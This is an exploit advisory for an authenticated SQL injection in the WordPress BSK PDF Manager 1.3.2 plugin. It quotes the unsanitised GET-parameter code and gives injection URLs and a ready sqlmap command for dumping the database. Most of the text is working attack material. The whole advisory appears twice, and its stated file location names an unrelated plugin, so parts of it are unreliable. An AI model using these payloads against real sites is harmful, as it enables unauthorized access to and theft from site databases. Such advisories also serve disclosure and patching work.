######################
# Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/
# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip
# Date : 2014-07-04
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location :
http://localhost/wp-content/plugins/compfight/compfight-search.php
######################
# Vulnerable code :
[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $categories_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['categoryid']) && $_GET['categoryid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $category_id = trim($_GET['categoryid']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $lists_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['pdfid']) && $_GET['pdfid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $pdf_id = trim($_GET['pdfid']);
$category_id = trim($_GET['categoryid']);
$pdf_id = trim($_GET['pdfid']);
######################
Exploit Code via Browser:
http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2
http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2
Exploit Code via sqlmap:
sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
#####################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/
# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip
# Date : 2014-07-04
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location :
http://localhost/wp-content/plugins/compfight/compfight-search.php
######################
# Vulnerable code :
[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $categories_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['categoryid']) && $_GET['categoryid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $category_id = trim($_GET['categoryid']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $lists_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['pdfid']) && $_GET['pdfid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $pdf_id = trim($_GET['pdfid']);
$category_id = trim($_GET['categoryid']);
$pdf_id = trim($_GET['pdfid']);
######################
Exploit Code via Browser:
http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2
http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2
Exploit Code via sqlmap:
sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
#####################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information